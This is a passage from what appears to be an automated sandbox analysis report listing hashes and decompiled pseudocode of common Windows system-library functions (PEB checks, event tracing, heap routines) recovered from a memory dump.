Opcode ID: d8ab7df56eff9d6c412d637c8b17d4b1d0592f12c7665a3da6da86ff39ba5797
Instruction ID: d0ac78c15ccb9cf7fdbd566cab64200b6e576069ea3fa0812a18a9e4579d9f2a
Opcode Fuzzy Hash: d8ab7df56eff9d6c412d637c8b17d4b1d0592f12c7665a3da6da86ff39ba5797
Instruction Fuzzy Hash: 9A01F732A022049BCB18EA75DC00AAFB7A8EFC5570F490069A9059F284DE70DD01C691

Uniqueness

Uniqueness Score: -1.00%

Function 0302B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0302B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03037D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03097016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0302b037
0x0302b039
0x0302b03b
0x0302b040
0x0307a60e
0x00000000
0x00000000
0x0307a61d
0x0302b04b
0x0302b04e
0x0307a627
0x0307a634
0x00000000
0x00000000
0x0307a641
0x0307a653
0x0307a643
0x0307a64c
0x0307a64c
0x0307a65b
0x00000000
0x00000000
0x00000000
0x0307a66c
0x0302b057
0x0302b057
0x0302b057
0x0302b046
0x0302b046
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 6cb34969c0ab0a1e55ccf73779f5756267cbfdc833347ee31ec1ef08850dd934
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: B2017172706684DFD336C75CC984F6A7BECEB45B50F0D04A1E915CB651D628DC40C724

Uniqueness

Uniqueness Score: -1.00%

Function 030E1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E030E1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E030E165E(__ebx, 0x3108ae4, (__edx -  *0x3108b04 >> 0x14) + (__edx -  *0x3108b04 >> 0x14), __edi, __ecx, (__edx -  *0x3108b04 >> 0x14) + (__edx -  *0x3108b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E030DAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03037D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E030CFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x030e1074
0x030e1080
0x030e1082
0x030e108a
0x030e108f
0x030e1093
0x030e10ab
0x030e10ab
0x030e10c3
0x030e10cf
0x030e10e1
0x030e10d1
0x030e10da
0x030e10da
0x030e10e9
0x030e10f5
0x030e10f5
0x030e10fe

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0380a941749e2d04bee8d1d7d9b95d562d538b0eb27ac5c0d5e132ea3f7de734
Instruction ID: 791db7362c7827222805289520298fe248e0c26ba9a8f0bf6cb0079da391f9c2
Opcode Fuzzy Hash: 0380a941749e2d04bee8d1d7d9b95d562d538b0eb27ac5c0d5e132ea3f7de734
Instruction Fuzzy Hash: 10019C723053419FC714EF29C800B5AB7E5ABC4310F048919F88187290DF70D440CB92

Uniqueness

Uniqueness Score: -1.00%

Function 030CFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E030CFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x310d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0305FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03037D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0305B640(E03059AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x030cfe3f
0x030cfe3f
0x030cfe4e
0x030cfe58
0x030cfe5d
0x030cfe5f
0x030cfe6a
0x030cfe72
0x030cfe75
0x030cfe78
0x030cfe83
0x030cfe95
0x030cfe85
0x030cfe8e
0x030cfe8e
0x030cfea0
0x030cfea1
0x030cfea3
0x030cfea8
0x030cfebd

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73c063aebc91927916560aeb873bddd7e2fdc64969306da85e28c837b25e5eb
Instruction ID: 3b6303165031db6c9db18e6e4ab29740d2602166d4c8ea4d1cd4196ef4d69887
Opcode Fuzzy Hash: c73c063aebc91927916560aeb873bddd7e2fdc64969306da85e28c837b25e5eb
Instruction Fuzzy Hash: 96018875E01359ABCB14DFA9D845FEFB7B8EF84710F044066B900DF281DA749A01C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 030CFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E030CFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x310d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0305FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03037D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0305B640(E03059AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x030cfec0
0x030cfec0
0x030cfecf
0x030cfed9
0x030cfede
0x030cfee0
0x030cfeeb
0x030cfef3
0x030cfef6
0x030cfef9
0x030cff04
0x030cff16
0x030cff06
0x030cff0f
0x030cff0f
0x030cff21
0x030cff22
0x030cff24
0x030cff29
0x030cff3e

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2df895cfcb813fca436936c099ecdd98f86b4d791d9c8ec278111e394bf8de
Instruction ID: 39b8021361d2a0d6a479db7c17a90184387082c5d401301b506e36ae86f96738
Opcode Fuzzy Hash: eb2df895cfcb813fca436936c099ecdd98f86b4d791d9c8ec278111e394bf8de
Instruction Fuzzy Hash: 5B018475E02349ABCB14DBA9D845FAFB7B8EF85710F04406AB900EB290DA749A01C795

Uniqueness

Uniqueness Score: -1.00%

Function 030E8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E030E8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x310d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03037D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0305B640(E03059AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x030e8a62
0x030e8a71
0x030e8a79
0x030e8a82
0x030e8a85
0x030e8a89
0x030e8a8c
0x030e8a8f
0x030e8a92
0x030e8a95
0x030e8a9f
0x030e8ab1
0x030e8aa1
0x030e8aaa
0x030e8aaa
0x030e8abc
0x030e8abd
0x030e8abf
0x030e8ac4
0x030e8ada

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b3ee9e6ab137fcf5fd1e897fc2bc75b8fdd63ea7eaf9ce3e9bb22d7ed372ed
Instruction ID: 80b4a421727c59a6526a20caaa6f3df1019c8ec6453d878fcf8ce5af5d1d82ab
Opcode Fuzzy Hash: 43b3ee9e6ab137fcf5fd1e897fc2bc75b8fdd63ea7eaf9ce3e9bb22d7ed372ed
Instruction Fuzzy Hash: 62012CB5A0131CAFDB04DFA9D9419EEB7B8EF49710F14405AF904EB341D734A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 030E8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E030E8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x310d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03037D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0305B640(E03059AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x030e8ed6
0x030e8ee5
0x030e8eed
0x030e8ef0
0x030e8efa
0x030e8f03
0x030e8f0c
0x030e8f15
0x030e8f24
0x030e8f27
0x030e8f31
0x030e8f43
0x030e8f33
0x030e8f3c
0x030e8f3c
0x030e8f4e
0x030e8f4f
0x030e8f51
0x030e8f56
0x030e8f69

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c838a87654c816575451cb745aa9904f470bfbdf591bb02a1e68d6ea36e81b3c
Instruction ID: b202ca719ace8221a562f51e294c1f6df022022a1dc3d935b527d876c1cbc1f2
Opcode Fuzzy Hash: c838a87654c816575451cb745aa9904f470bfbdf591bb02a1e68d6ea36e81b3c
Instruction Fuzzy Hash: 69111E74A012099FDB04DFA8D441BAEF7F4FF08700F0482AAE918EB381E7349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0301DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0301DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0301DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0301E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0301E8B0(__ecx, _t14, 0xfff);
							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0301db64
0x0301db66
0x0301db6b
0x0301dbaa
0x0301db71
0x0301db76
0x0301db7a
0x0301dba3
0x0301db7c
0x0301db87
0x0301db8b
0x03074fa1
0x03074fb3
0x03074fb8
0x0301db91
0x0301db96
0x0301db98
0x0301db98
0x0301db8b
0x0301db7a
0x0301db9d
0x0301dba2

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 4f7cac531eb784e3703978af1c7a1e9a70fb472a7b255ee64313aad86b71a9d2
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 5DF0F677203622DBD332EA5588D0F7FF6998FC2A60F1A0435F6069F344CA608C1286E0

Uniqueness

Uniqueness Score: -1.00%

Function 0301B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0301B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03037D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03037D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03097016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0301b1e8
0x0301b1ea
0x0301b1f3
0x03074a17
0x0301b1f9
0x0301b1f9
0x0301b1f9
0x0301b201
0x03074a21
0x03074a2e
0x00000000
0x00000000
0x03074a3b
0x03074a4d
0x03074a3d
0x03074a46
0x03074a46
0x03074a55
0x00000000
0x00000000
0x00000000
0x0301b20a
0x0301b20a
0x0301b20a
0x0301b20a

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: c62075f3b6029595a608251dc9ead7da71db98185ba7b7c940a7112a44155f26
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 8801D132602684EBD322D75EC804FA9BBD8EF82B50F0D04A1F9148B6B1D778C810C258

Uniqueness

Uniqueness Score: -1.00%

Function 030AFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E030AFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x310d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03037D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0305B640(E03059AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x030afe96
0x030afe9e
0x030afea1
0x030afead
0x030afeb3
0x030afeb9
0x030afec3
0x030afed5
0x030afec5
0x030afece
0x030afece
0x030afee0
0x030afee1
0x030afee3
0x030afee8
0x030afefb

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2898e10c40ba7d9ccb31227c28009e29808af0c47b4b2e1cffe3717d8c6264e1
Instruction ID: 65c6c005f267ecf514d24bf99e1ca18673ff54360a36da0d940cb2797ac4bbd2
Opcode Fuzzy Hash: 2898e10c40ba7d9ccb31227c28009e29808af0c47b4b2e1cffe3717d8c6264e1
Instruction Fuzzy Hash: 6F014F74A01209AFCB14DFA8D541AAEB7F4EF08304F144159B904DF382D635E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 030D131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E030D131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x310d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03037D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0305B640(E03059AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x030d131b
0x030d132a
0x030d1330
0x030d1336
0x030d133e
0x030d1341
0x030d1344
0x030d134f
0x030d1361
0x030d1351
0x030d135a
0x030d135a
0x030d136c
0x030d136d
0x030d136f
0x030d1374
0x030d1387

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74c5ba422ff44fa5daa4cdec692832302a279b4ec373d004497cdb77cb9786a
Instruction ID: a2e1636e7f5f95ef84a0948d1913ed7e41ba14d8b84e3abf57ed8c57ecdb3f66
Opcode Fuzzy Hash: f74c5ba422ff44fa5daa4cdec692832302a279b4ec373d004497cdb77cb9786a
Instruction Fuzzy Hash: 6D011DB5A02308AFCB44EFA9D545AAEB7F4EF48700F004059F805EB341EA749A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 030E8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E030E8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x310d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03037D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0305B640(E03059AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x030e8f6a
0x030e8f79
0x030e8f81
0x030e8f84
0x030e8f8b
0x030e8f91
0x030e8f94
0x030e8f9e
0x030e8fb0
0x030e8fa0
0x030e8fa9
0x030e8fa9
0x030e8fbb
0x030e8fbc
0x030e8fbe
0x030e8fc3
0x030e8fd6

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d364c9d0979e21617983b58b141b5e703f8e2ce858a9d5140aefb760c6d2ad92
Instruction ID: 3473ddb172dac9440e40ffd3a45521b368f9829d8a0385dddc460fe99c398bef
Opcode Fuzzy Hash: d364c9d0979e21617983b58b141b5e703f8e2ce858a9d5140aefb760c6d2ad92
Instruction Fuzzy Hash: 2001EC74A0220CAFDB04EFA8D545AAEB7F4EF48700F508459F905EB381EB74EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030D1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E030D1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x310d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03037D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0305B640(E03059AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x030d1608
0x030d1617
0x030d161d
0x030d1625
0x030d1628
0x030d162b
0x030d1636
0x030d1648
0x030d1638
0x030d1641
0x030d1641
0x030d1653
0x030d1654
0x030d1656
0x030d165b
0x030d166e

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0481eec89e58246b2a0d99568cf37c1851c22ef352bfd78da4d0969c27ccbbbe
Instruction ID: cf3da9e69fd2f4501dce0015742697063a804c97e732555cd3c0862d9f0e83d3
Opcode Fuzzy Hash: 0481eec89e58246b2a0d99568cf37c1851c22ef352bfd78da4d0969c27ccbbbe
Instruction Fuzzy Hash: 85F06275A06348EFCB04EFA8D445AAFB7F8EF48300F044059F905EB381EA349900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0303C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0303C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0303C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2ff11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E030E88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0303c577
0x0303c57d
0x0303c581
0x0303c5b5
0x0303c5b9
0x0303c5ce
0x0303c5ce
0x0303c5ca
0x00000000
0x0303c5ca
0x0303c5c4
0x0303c5c8
0x00000000
0x00000000
0x00000000
0x0303c5ad
0x00000000
0x0303c5af

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90c1f8b4da0b7fc6bf07299ffa5fbc12336e28f91ef3e7f9bf49f5d0ae50ef5e
Instruction ID: 52f9605118c206948c4c9f30b084e5027425656e8d18c4a0c37e6dc1b952bf98
Opcode Fuzzy Hash: 90c1f8b4da0b7fc6bf07299ffa5fbc12336e28f91ef3e7f9bf49f5d0ae50ef5e
Instruction Fuzzy Hash: 86F09AB2A177949FF7B1EB688104B62BBEC9F47770F5888A7D50AE7211C6A4DCC0C250

Uniqueness

Uniqueness Score: -1.00%

Function 0305927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0305927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03034620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0305FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E030592C6(_t11, _t14);
				}
				return _t11;
			}

0x03059295
0x03059299
0x0305929f
0x030592aa
0x030592ad
0x030592ae
0x030592af
0x030592b0
0x030592b4
0x030592bb
0x030592bb
0x030592c5

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: bc2e25136402031cb74a4683c3cf3916608d30a08c8738ce4154160977547de6
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: A9E09B723416406BD751DE56DC84F57779DDFC2721F044079B9045F242C7E5DD0987A0

Uniqueness

Uniqueness Score: -1.00%

Function 030D2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E030D2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E030CFD22(__ecx);
				_t19 =  *0x310849c - _t3; // 0x26d2d1bd
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3108748; // 0x0
					if(__eflags <= 0) {
						E030D1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3108724 & 0x00000004;
							if(( *0x3108724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3108724; // 0x0
					return E030C8DF1(__ebx, 0xc0000374, 0x3105890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x030d2076
0x030d2078
0x030d207d
0x030d2083
0x030d20a4
0x030d20aa
0x030d20ac
0x030d20b7
0x030d20ba
0x030d20bc
0x030d20c9
0x030d20c9
0x030d20d0
0x030d20d2
0x00000000
0x030d20d2
0x030d20be
0x030d20c3
0x030d20c5
0x030d20c7
0x00000000
0x00000000
0x030d20c7
0x030d20bc
0x030d20d4
0x030d2085
0x030d2085
0x030d20a3
0x030d20a3

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a898c4d6bcdfbffe4debb19bdfb13e1258ab593db5864441562fb5302e1bdc9
Instruction ID: f26e2264f894754851d78f52553250e997752a78e678ef328cd3cafadf9ab14a
